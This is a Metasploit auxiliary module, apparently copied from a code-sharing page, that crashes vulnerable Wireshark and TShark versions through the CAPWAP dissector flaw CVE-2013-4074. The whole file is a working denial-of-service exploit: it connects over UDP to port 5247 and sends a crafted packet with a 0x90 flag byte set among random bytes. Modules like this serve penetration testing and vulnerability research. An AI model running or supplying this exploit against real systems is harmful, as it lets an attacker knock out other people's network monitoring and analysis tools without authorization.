Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Udp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'           => 'Wireshark CAPWAP Dissector DoS',
13
      'Description'    => %q{
14
        This module injects a malformed UDP packet to crash Wireshark and TShark 1.8.0 to 1.8.7, as well
15
        as 1.6.0 to 1.6.15. The vulnerability exists in the CAPWAP dissector which fails to handle a
16
        packet correctly when an incorrect length is given.
17
      },
18
      'License'        => MSF_LICENSE,
19
      'Author'         =>
20
        [
21
          'Laurent Butti', # Discovery vulnerability
22
          'j0sm1'  # Auxiliary msf module
23
        ],
24
      'References'     =>
25
        [
26
          ['CVE', '2013-4074'],
27
          ['OSVDB', '94091'],
28
          ['BID', '60500']
29
        ],
30
      'DisclosureDate' => '2014-04-28'))
31

32
    # Protocol capwap needs port 5247 to trigger the dissector in wireshark
33
    register_options([ Opt::RPORT(5247) ])
34
  end
35

36
  def run
37

38
    connect_udp
39

40
    # We send a packet incomplete to crash dissector
41
    print_status("#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...")
42
    # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then
43
    # the dissector crash
44
    # You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt
45
    # F = 1 ; L = 0 ; W = 0 ; M = 1 ; K = 0 ; Flags = 000
46
    buf = Rex::Text.rand_text(3) + "\x90" + Rex::Text.rand_text(15)
47
    udp_sock.put(buf)
48

49
    disconnect_udp
50

51
  end
52
end
53

54